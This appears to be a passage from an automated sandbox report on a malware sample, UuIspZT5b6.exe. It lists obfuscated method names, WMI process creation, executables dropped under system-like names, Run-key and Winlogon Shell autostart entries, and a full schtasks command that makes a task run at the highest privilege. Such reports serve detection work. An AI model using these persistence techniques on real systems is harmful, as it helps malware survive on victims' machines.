                          Source: UuIspZT5b6.exe, RZoeIscBqkeNeiDTv6D.csHigh entropy of concatenated method names: 'q64', 'P9X', 'y7nI2Y4IB41', 'vmethod_0', 'lgEI1wWTwE4', 'imethod_0', 'EdxnAMIZ8Gx5Je10bpQ1', 'J5DcnxIZzhEjHaftm9dl', 'OINLoyI7N88Lx1Pgo0h7', 'UuP28hI7IkmfLUsXrR16'
                          Source: UuIspZT5b6.exe, Awrve03dpXGsWxCcXhb.csHigh entropy of concatenated method names: 'hsR3LVWEBx', 'sSG3enWSDs', 'QyEY5pIjFAC3PtLXQVa4', 'eXARrDIjQOKqgHNIHEU7', 'jbKN3QIjjCtXqRNfOWKx', 'e05fWGIjEfkdE5OeMfOU', 'frJTW3IjZgwvvB22C1ib', 'ROVq3eIj7CJIwsZyn5RI', 'Q5tQIGIju9Orm2Jy497D'
                          Source: UuIspZT5b6.exe, uUM23QqbcGDyQhJ4iqS.csHigh entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'tgJSw8Isny73tcBbQe8I', 'xwUSrNIsgXejZqU3Fvsb', 'ILVF8fIsK2e1BL9tVYoC'
                          Source: UuIspZT5b6.exe, hfkmueZWplUUPRGUkIW.csHigh entropy of concatenated method names: 'pOyZ8dIWAm', 'jSSZzCufqq', 'q9F7NPjfK4', 'jUL7IPcLwJ', 'MeU73sRShu', 'lfw7yMGBnd', 'Rpx', 'method_4', 'f6W', 'uL1'
                          Source: UuIspZT5b6.exe, YBSL85OIurPB0pEYBJL.csHigh entropy of concatenated method names: 'a0VOyS6Dlw', 'RWaO24lCTc', 'lK8OcfLnoE', 'PKMvYaIuJw1BfZn6XRm3', 'TsP66LIuXRDQfNayZpWL', 'XGeoPPIufYCueDQhgfAO', 'cA0L5nIuo6ptmG9W9ptR', 'fUbA3nIup59VxsPbqgiw', 'wwZTmaIudt2mMo9NusH6', 'ancOWTIuHgt7Oj3FTebe'
                          Source: UuIspZT5b6.exe, LECsMROmVnHQhr2ootU.csHigh entropy of concatenated method names: 'Y1nO5BEjkG', 'MTjOtwfwIK', 'd3RhueIvo50WwHtkMZXc', 'y587qjIvflqnFUyd4Dmx', 'iEppPsIvJeUsjx7crk6m', 'pxgOAkCbGm', 'fpKOlMnIp5', 'e4IODSaEnM', 'ooHOPpaq3i', 'x4tOgMExx3'
                          Source: UuIspZT5b6.exe, LIBHZ3pTD8nLgmlwZ4S.csHigh entropy of concatenated method names: 'OaapDTCvVG', 'kASpPclGqU', 'S1SpgGg1dV', 'LCswNBI4a0jgrZkgWnLU', 'Y4yVEvI4CVS0IX4IG2NJ', 'ogmE0WI4xH4qxQ7w90QD', 'snmTJAI4GIPKxlvLNoD6', 'AZ9p4AbYMJ', 'Xulpm7edHW', 'R7Sp9LYoQH'
                          Source: UuIspZT5b6.exe, yk3LFASYMvbVt9EZPCu.csHigh entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'AjPEjWIbgRNT4qluJrgJ', 'TPwM6rIbKiM9dIo3b9as', 'V87AZtIbnBKp0LU0yxeC', 'GQVe4kIbMRFPlRpsa2nq'
                          Source: UuIspZT5b6.exe, qFk3mmpUNeyyK3GlMLD.csHigh entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'Wj0I10Tx7tN', 'UycI2DLT6BT', 'kEiRZrI4bjR9gqIBnxeJ', 'Kjake7I4q8cyYb7nO2ZZ', 'RCNYIeI4VQ4kjjNQMb7n', 'bbmGUtI4TYZUqUwt8bKu', 'lDhsHKI4BgGrCpBC1119'
                          Source: UuIspZT5b6.exe, XUSGPMS3xPjFu9equV4.csHigh entropy of concatenated method names: 'aQfS21PHH7', 'rHmScjXa7K', 'KgjSwZsXcJ', 'ul2SO0tYN4', 'sSKS1gR4RK', 'yDPSSXsBl8', 'YWiSrSJL7d', 'WJ1Sk9qrrY', 'RsOS6Kktmc', 'Xe1S0er6Bk'
                          Source: UuIspZT5b6.exe, sCFHaT50RcoMjdECtZ6.csHigh entropy of concatenated method names: 'Sw25XLOjlv', 's725pae6P0', 'uJd5LfjANr', 'rb65e2UHn3', 'E2H5C4Qw1G', 'MeY5xqkKOA', 'wZd5aXOjJE', 'Nsj5GmNgHk', 'Dispose', 'nXPSOjIWBaCdT0TLFggN'
                          Source: UuIspZT5b6.exe, zoops3wxHG8hI2ptScr.csHigh entropy of concatenated method names: 'ulqwZYy6V8', 'kG0IGQI7gpnia2CuXZmA', 'kQTd3PI7DiPf7YO8UQxX', 'ORs7WdI7PrbCrZIETITi', 'qLHavVI7KCbVF7fhpwhs', 'a75AGaI7n2i34MspLhVb', 'E94', 'P9X', 'vmethod_0', 'V0mI2dKiKv4'
                          Source: UuIspZT5b6.exe, UrleZCaCBWfXfuv64wU.csHigh entropy of concatenated method names: 'xb5aanu7RF', 'ip1aG1pM5O', 'sxPaQwUOQI', 'YMAajdlfuy', 'lNhaFhHZR2', 'x7uq1QIDSAN9jsBYQ9eY', 'ATDF16IDOKf8mZeHH5CZ', 'iL6mctID1i3TSlauYAgN', 'D2Lg1JIDryt2RKHTcGDr', 'jgKjgnIDkXk0Y7DgvAMw'
                          Source: UuIspZT5b6.exe, W57imU3Z1anf7FNs7j7.csHigh entropy of concatenated method names: 'WYx3mcSsU4', 'G8B39RZ9Dw', 'bd3KOHIj4PbiKFq1NJnd', 'dSS4gKIjmeMYX0qZ119N', 'SK73PtiVkc', 'LXmsNgIjDi1KMAtFWSgx', 'KcbFCoIjPOjIT8s59JR5', 'KyJvVdIjALPbyZr24jIE', 'F0nXNIIjlIpRQMMKCpis', 'al03uE9v9P'
                          Source: UuIspZT5b6.exe, lwg5l2OpoK2p9B0am4A.csHigh entropy of concatenated method names: 'Tj6OjdxhuS', 'Hj25BmIu5wDwrv0qc7C5', 'Vj5niVIuULdof4vRajIC', 'sogbmaIuiKvVgen6pQ7a', 'OrgwiRIutQKO6ZZHCQRA', 'GNDZ4FIuWIeQJuQ6AUYh', 'GvPkK6IuhskHZVlah6uP', 'vQ1OHS4coh', 'Fl6OLCL8oR', 'vMNOenoFTC'

                          Persistence and Installation Behavior

                          barindex
                          Creates processes via WMI
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Drops executable to a common third party application directory
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile written: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeJump to behavior
                          Drops executables to the windows directory (C:\Windows) and starts them
                          Source: unknownExecutable created and started: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe
                          Infects executable files (exe, dll, sys, html)
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile created: C:\Users\user\Desktop\gSKbOmrW.logJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                          Source: C:\Recovery\dllhost.exeFile created: C:\Users\user\Desktop\CkfpANUC.logJump to dropped file
                          Source: C:\Recovery\dllhost.exeFile created: C:\Users\user\Desktop\tznhlkeP.logJump to dropped file
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile created: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeJump to dropped file
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile created: C:\Recovery\dllhost.exeJump to dropped file
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile created: C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exeJump to dropped file
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile created: C:\Users\user\Desktop\UZVKerGo.logJump to dropped file
                          Source: C:\Recovery\dllhost.exeFile created: C:\Users\user\Desktop\MQZNFpoe.logJump to dropped file
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile created: C:\Users\Public\Downloads\TyCvtMoTOGrwUAEyotiaCQmKvM.exeJump to dropped file
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile created: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeJump to dropped file
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile created: C:\Users\user\Desktop\WkrLeKmp.logJump to dropped file
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile created: C:\Users\user\Desktop\yfmgiIMl.logJump to dropped file
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile created: C:\Users\user\Desktop\pfMyjKNB.logJump to dropped file
                          Source: C:\Recovery\dllhost.exeFile created: C:\Users\user\Desktop\CcvWVetw.logJump to dropped file
                          Source: C:\Recovery\dllhost.exeFile created: C:\Users\user\Desktop\lVerBrOi.logJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile created: C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exeJump to dropped file
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile created: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeJump to dropped file
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile created: C:\Users\user\Desktop\pfMyjKNB.logJump to dropped file
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile created: C:\Users\user\Desktop\yfmgiIMl.logJump to dropped file
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile created: C:\Users\user\Desktop\gSKbOmrW.logJump to dropped file
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile created: C:\Users\user\Desktop\WkrLeKmp.logJump to dropped file
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeFile created: C:\Users\user\Desktop\UZVKerGo.logJump to dropped file
                          Source: C:\Recovery\dllhost.exeFile created: C:\Users\user\Desktop\CkfpANUC.logJump to dropped file
                          Source: C:\Recovery\dllhost.exeFile created: C:\Users\user\Desktop\MQZNFpoe.logJump to dropped file
                          Source: C:\Recovery\dllhost.exeFile created: C:\Users\user\Desktop\CcvWVetw.logJump to dropped file
                          Source: C:\Recovery\dllhost.exeFile created: C:\Users\user\Desktop\tznhlkeP.logJump to dropped file
                          Source: C:\Recovery\dllhost.exeFile created: C:\Users\user\Desktop\lVerBrOi.logJump to dropped file

                          Boot Survival

                          barindex
                          Creates an autostart registry key pointing to binary in C:\Windows
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TyCvtMoTOGrwUAEyotiaCQmKvMJump to behavior
                          Creates an undocumented autostart registry key
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                          Creates multiple autostart registry keys
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UuIspZT5b6Jump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TyCvtMoTOGrwUAEyotiaCQmKvMJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhostJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run IdleJump to behavior
                          Uses schtasks.exe or at.exe to add and modify task schedules
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "TyCvtMoTOGrwUAEyotiaCQmKvMT" /sc MINUTE /mo 10 /tr "'C:\Windows\IdentityCRL\production\TyCvtMoTOGrwUAEyotiaCQmKvM.exe'" /rl HIGHEST /f
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhostJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhostJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhostJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhostJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TyCvtMoTOGrwUAEyotiaCQmKvMJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TyCvtMoTOGrwUAEyotiaCQmKvMJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TyCvtMoTOGrwUAEyotiaCQmKvMJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TyCvtMoTOGrwUAEyotiaCQmKvMJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run IdleJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run IdleJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run IdleJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run IdleJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UuIspZT5b6Jump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UuIspZT5b6Jump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TyCvtMoTOGrwUAEyotiaCQmKvMJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TyCvtMoTOGrwUAEyotiaCQmKvMJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TyCvtMoTOGrwUAEyotiaCQmKvMJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TyCvtMoTOGrwUAEyotiaCQmKvMJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TyCvtMoTOGrwUAEyotiaCQmKvMJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TyCvtMoTOGrwUAEyotiaCQmKvMJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TyCvtMoTOGrwUAEyotiaCQmKvMJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TyCvtMoTOGrwUAEyotiaCQmKvMJump to behavior

                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Loading BitLocker PowerShell Module
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
